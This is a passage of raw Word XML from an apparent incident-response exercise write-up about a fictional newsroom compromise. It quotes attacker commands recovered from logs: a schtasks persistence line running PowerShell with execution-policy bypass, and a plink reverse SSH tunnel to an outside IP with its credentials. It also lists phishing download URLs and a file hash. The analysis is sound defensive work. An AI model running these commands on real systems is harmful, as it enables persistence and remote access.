    <w:p w14:paraId="7983B0B5" w14:textId="5AF3E6F2" w:rsidR="001110EC" w:rsidRDefault="001110EC" w:rsidP="00495287"/>
    <w:p w14:paraId="5AE4B98D" w14:textId="0C2FA302" w:rsidR="001110EC" w:rsidRDefault="001110EC" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">Now obtain the power shell in a controlled environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6E122" w14:textId="4A6F05F0" w:rsidR="001110EC" w:rsidRDefault="001110EC" w:rsidP="00495287">
      <w:r>
        <w:t>Plink is used to establish SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF1EDE" w14:textId="1AB11BF0" w:rsidR="001110EC" w:rsidRDefault="001110EC" w:rsidP="00495287">
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>look into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> process creation after the download</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1497B" w14:textId="6A5743FF" w:rsidR="00D74C9E" w:rsidRDefault="00D74C9E" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">Search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file, and we see a task is scheduled at </w:t>
      </w:r>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>2024-01-05T11:22:44Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run the script under </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> every 5 hours and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>by pass</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> execution policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129BF0FD" w14:textId="2202FFC6" w:rsidR="00D74C9E" w:rsidRDefault="00D74C9E" w:rsidP="00495287">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>schtasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t xml:space="preserve"> /create /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t xml:space="preserve"> hourly /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>mo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t xml:space="preserve"> 5 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>tn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t xml:space="preserve"> "Hacktivist Manifesto" /tr "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t xml:space="preserve"> Bypass -File C:\ProgramData\hacktivist_manifesto.ps1"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2FD3B" w14:textId="585E1E6E" w:rsidR="00D74C9E" w:rsidRDefault="00D74C9E" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">The script was run on Sonia’s host at </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Hlk180153640"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>2024-01-05T11:55:22Z</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331D4298" w14:textId="77777777" w:rsidR="00D74C9E" w:rsidRPr="00D74C9E" w:rsidRDefault="00D74C9E" w:rsidP="00D74C9E">
      <w:r w:rsidRPr="00D74C9E">
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t xml:space="preserve"> Bypass -File C:\ProgramData\hacktivist_manifesto.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115743CF" w14:textId="77777777" w:rsidR="00D74C9E" w:rsidRDefault="00D74C9E" w:rsidP="00495287"/>
    <w:p w14:paraId="373366D9" w14:textId="4CA14E91" w:rsidR="00D74C9E" w:rsidRPr="0074077C" w:rsidRDefault="00D74C9E" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Now Look into plink process under process event log on Sonia’s host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A9A899" w14:textId="77777777" w:rsidR="00D74C9E" w:rsidRDefault="00D74C9E" w:rsidP="00D74C9E">
      <w:r w:rsidRPr="00D74C9E">
        <w:t xml:space="preserve">plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>thruthW!llS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D74C9E">
        <w:t>3tUfree 136.130.190.181</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A7993" w14:textId="7BBC07CF" w:rsidR="00B2453A" w:rsidRDefault="00B2453A" w:rsidP="00D74C9E">
      <w:r w:rsidRPr="00B2453A">
        <w:t xml:space="preserve">This tunnel would allow Remote Desktop Protocol (RDP) connections from the remote machine (IP: 136.130.190.181) to be forwarded to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B2453A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B2453A">
        <w:t xml:space="preserve"> (your machine), effectively exposing your local machine’s RDP service (on port 3389) to the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389903EE" w14:textId="0FB2C09C" w:rsidR="00B2453A" w:rsidRDefault="00B2453A" w:rsidP="00D74C9E">
      <w:r w:rsidRPr="00B2453A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-l $had0w</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2453A">
        <w:t>: This indicates the login username on the remote machine</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CADE9C" w14:textId="60FDDCFC" w:rsidR="00B2453A" w:rsidRDefault="00B2453A" w:rsidP="00D74C9E">
      <w:r w:rsidRPr="00B2453A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-pw </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B2453A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>thruthW!llS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B2453A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3tUfree</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2453A">
        <w:t>: This specifies the password for the SSH login</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA79E71" w14:textId="2A720A4A" w:rsidR="0074077C" w:rsidRDefault="0074077C" w:rsidP="00D74C9E">
      <w:r>
        <w:t>There is no other suspicious activity afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B29E3" w14:textId="3F7E8D83" w:rsidR="00006FCF" w:rsidRPr="0074077C" w:rsidRDefault="00006FCF" w:rsidP="00D74C9E">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>look into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> process event to see if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> on any other host especially the printer and Ronnie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8E707" w14:textId="1A716ED5" w:rsidR="00006FCF" w:rsidRDefault="00006FCF" w:rsidP="00D74C9E">
      <w:r>
        <w:t xml:space="preserve">We see many </w:t>
      </w:r>
      <w:r w:rsidR="0074077C">
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> got affected including Ronnie, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BB32E" w14:textId="1776AD4A" w:rsidR="00B2453A" w:rsidRDefault="00B2453A" w:rsidP="00D74C9E"/>
    <w:p w14:paraId="0244B1F8" w14:textId="06C704B3" w:rsidR="00954C3F" w:rsidRDefault="00954C3F" w:rsidP="00D74C9E">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coworker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> found the suspicious file fakestroy.docx on Ronnie’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC739F" w14:textId="3EA11D78" w:rsidR="00954C3F" w:rsidRDefault="00954C3F" w:rsidP="00D74C9E">
      <w:r>
        <w:t>Look into the event logs to see when, who</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, where</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it was downloaded. As well as sources of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C8216" w14:textId="4ADC430D" w:rsidR="00954C3F" w:rsidRDefault="00954C3F" w:rsidP="00D74C9E">
      <w:r>
        <w:t>Out bound network log shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A92B58" w14:textId="7DC8BCB2" w:rsidR="00954C3F" w:rsidRDefault="00954C3F" w:rsidP="00D74C9E">
      <w:r>
        <w:t xml:space="preserve">Link of the download: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00EA13DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://hire-recruit.org/files/fakescandal/2024/fakestory.docx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidRPr="00954C3F">
        <w:t>2024-01-31T09:47:51Z</w:t>
      </w:r>
      <w:r>
        <w:t>. Only Ronnie’s Ip clicked the link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E460036" w14:textId="548A6E2B" w:rsidR="00D74C9E" w:rsidRDefault="00954C3F" w:rsidP="00495287">
      <w:r>
        <w:t>File creation log shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C42B0B" w14:textId="17C07ED0" w:rsidR="00954C3F" w:rsidRDefault="00954C3F" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">The file name fakestory.docx was downloaded at </w:t>
      </w:r>
      <w:r w:rsidRPr="00954C3F">
        <w:t>2024-01-31T09:47:51Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Ronnie’s host. File path is: </w:t>
      </w:r>
      <w:r w:rsidRPr="00954C3F">
        <w:t>C:\Users\romclovin\Downloads\fakestory.docx</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4471C916" w14:textId="3D482FB3" w:rsidR="00954C3F" w:rsidRDefault="00954C3F" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">Sha256: </w:t>
      </w:r>
      <w:r w:rsidRPr="00954C3F">
        <w:t>5f8a7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359847BC" w14:textId="01B39EE7" w:rsidR="007A689D" w:rsidRDefault="007A689D" w:rsidP="00495287">
      <w:r>
        <w:t>Ronnie doesn’t remember the download. Most likely downloaded by remote control activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1A759" w14:textId="5631B694" w:rsidR="007A689D" w:rsidRDefault="007A689D" w:rsidP="00495287">
      <w:r>
        <w:t>Look into the process event to see what happened after the download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C1A91" w14:textId="4599E395" w:rsidR="007A689D" w:rsidRDefault="007A689D" w:rsidP="007A689D">
      <w:r>
        <w:t xml:space="preserve">We see this command: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A689D">
        <w:t>move C:\Users\romclovin\Downloads\fakestory.docx C:\Users\romclovin\Documents\OpEdFinal_to_print.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidRPr="007A689D">
        <w:t>2024-01-31T10:26:20Z</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE9A898" w14:textId="77777777" w:rsidR="007A689D" w:rsidRDefault="007A689D" w:rsidP="007A689D"/>
    <w:p w14:paraId="00EA0D84" w14:textId="7122BCAA" w:rsidR="007A689D" w:rsidRDefault="007A689D" w:rsidP="007A689D">
      <w:r>
        <w:t>This is the final draft the printer received. Let’ s confirm that by looking at the email log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DA2BF" w14:textId="211F9D99" w:rsidR="007A689D" w:rsidRDefault="007A689D" w:rsidP="007A689D">
      <w:r>
        <w:t xml:space="preserve">The email was </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>semt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidRPr="007A689D">
        <w:t>2024-01-31T11:11:12Z</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D623B" w14:textId="7705BDFB" w:rsidR="001018E6" w:rsidRPr="007A689D" w:rsidRDefault="001018E6" w:rsidP="007A689D">
      <w:r w:rsidRPr="001018E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32563467" wp14:editId="73F7F07A">
            <wp:extent cx="5943600" cy="369570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2710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69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3AB5" w14:textId="6F100488" w:rsidR="007A689D" w:rsidRDefault="005C63D6" w:rsidP="00495287">
      <w:r>
        <w:t>For other hosts infected here is the root cause:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FBE5D5" w14:textId="3EA5B000" w:rsidR="0098575E" w:rsidRDefault="0098575E" w:rsidP="00495287">
      <w:r>
        <w:t>File creation log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6949406C" w14:textId="73AE7231" w:rsidR="005C63D6" w:rsidRDefault="0098575E" w:rsidP="00495287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00677D2C">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>byers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0045129F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0045129F">
        <w:t>Tobrokaw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005705BE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005705BE">
        <w:t>Peparket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005705BE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005705BE">
        <w:t>Neleaks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005705BE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00367481" w:rsidRPr="00367481">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00367481">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00367481" w:rsidRPr="00367481">
        <w:t>azuckerberg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00367481">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00811FCB">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00811FCB" w:rsidRPr="00811FCB">
        <w:t>apage</w:t>
      </w:r>
      <w:r w:rsidR="00811FCB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00811FCB">
        <w:t>Kebut</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA47BC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA47BC">
        <w:t>Kahopper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA47BC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA47BC">
        <w:t>Idtarbell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA47BC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004954CA" w:rsidRPr="004954CA">
        <w:t>bigates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0045129F" w:rsidRPr="0045129F">
        <w:t>Stop_Being_So_Broke_Get_Money_Now.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB9C8B" w14:textId="06DB6FAD" w:rsidR="00A52938" w:rsidRDefault="00057D6C" w:rsidP="00A52938">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00A52938">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://hire</w:t>
        </w:r>
        <w:r w:rsidRPr="0042792B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="00A52938">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42363981" w14:textId="77777777" w:rsidR="00057D6C" w:rsidRPr="00057D6C" w:rsidRDefault="00057D6C" w:rsidP="00057D6C">
      <w:r w:rsidRPr="00057D6C">
        <w:t>http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EBE1B4" w14:textId="77777777" w:rsidR="00057D6C" w:rsidRPr="00A52938" w:rsidRDefault="00057D6C" w:rsidP="00A52938"/>
    <w:p w14:paraId="70CD07A7" w14:textId="77777777" w:rsidR="00A52938" w:rsidRDefault="00A52938" w:rsidP="00495287"/>
    <w:p w14:paraId="5988C7E0" w14:textId="16A04D18" w:rsidR="00BF58F6" w:rsidRDefault="00BF58F6" w:rsidP="00495287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stjobs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="007D734D">
        <w:t>gose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00367481">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00367481">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00367481" w:rsidRPr="00367481">
        <w:t>itorvalds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004366C0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004366C0" w:rsidRPr="004366C0">
        <w:t>darather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A00315">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A00315" w:rsidRPr="00A00315">
        <w:t>chniles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A00315">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A00315" w:rsidRPr="00A00315">
        <w:t>cabernstein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004954CA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004954CA" w:rsidRPr="004954CA">
        <w:t>bowoodward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00081F55">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00081F55" w:rsidRPr="00081F55">
        <w:t>bawalters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF58F6">
        <w:t>Valdorian_Times_Editorial_Offer_Letter.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC4D53" w14:textId="6AE0BFD4" w:rsidR="004F3B4C" w:rsidRDefault="00FE7B40" w:rsidP="004F3B4C">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="004F3B4C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="210E65E5" w14:textId="77777777" w:rsidR="00FE7B40" w:rsidRPr="00FE7B40" w:rsidRDefault="00FE7B40" w:rsidP="00FE7B40">
      <w:r w:rsidRPr="00FE7B40">
        <w:t>http://promotion-recruit.com/files/modules/online/Valdorian_Times_Editorial_Offer_Letter.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B817743" w14:textId="77777777" w:rsidR="00FE7B40" w:rsidRPr="004F3B4C" w:rsidRDefault="00FE7B40" w:rsidP="004F3B4C"/>
    <w:p w14:paraId="0D6C0110" w14:textId="77777777" w:rsidR="004F3B4C" w:rsidRDefault="004F3B4C" w:rsidP="00495287"/>
    <w:p w14:paraId="16B10E25" w14:textId="00D91C27" w:rsidR="007D734D" w:rsidRDefault="007D734D" w:rsidP="00495287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sehersh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Romclovin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004366C0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004366C0" w:rsidRPr="004366C0">
        <w:t>crzimmerman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D734D">
        <w:t>Editorial_J0b_Openings_2024.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94E481" w14:textId="27CAAC60" w:rsidR="002E5AB0" w:rsidRDefault="00DC5217" w:rsidP="002E5AB0">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="002E5AB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://promotion-job.org/share/Editorial_J0b_Openings_2024.docx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F8DD9A4" w14:textId="77777777" w:rsidR="00DC5217" w:rsidRDefault="00DC5217" w:rsidP="002E5AB0"/>
    <w:p w14:paraId="6B9E3256" w14:textId="75DC061C" w:rsidR="00DC5217" w:rsidRDefault="00DC5217" w:rsidP="002E5AB0">
      <w:r>
        <w:t xml:space="preserve">All from email links. Block all suspicious domains, Ips and hash values. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805C716" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="002E5AB0"/>
    <w:p w14:paraId="7FD22945" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="00491E76">
      <w:r>
        <w:t>Case Timeline:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B755A">
        <w:t>2024-01-31T11:11:12Z</w:t>
      </w:r>
      <w:r>
        <w:t>: The email with final draft was sent by Ronnie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8649C2" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="00491E76">
      <w:r w:rsidRPr="007A689D">
        <w:t>2024-01-31T10:26:20Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA541C">
        <w:t>We see this command: move C:\Users\romclovin\Downloads\fakestory.docx C:\Users\romclovin\Documents\OpEdFinal_to_print.docx at 2024-01-31T10:26:20Z.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> On Ronnie’s host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C85D8A" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="00491E76">
      <w:r w:rsidRPr="00DC0DD5">
        <w:t>2024-01-10T08:55:51Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The same </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file was downloaded on Ronnie’s host. Plink was executed for reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB9243D" w14:textId="77777777" w:rsidR="00491E76" w:rsidRDefault="00491E76" w:rsidP="00491E76">
      <w:r w:rsidRPr="00DC0DD5">
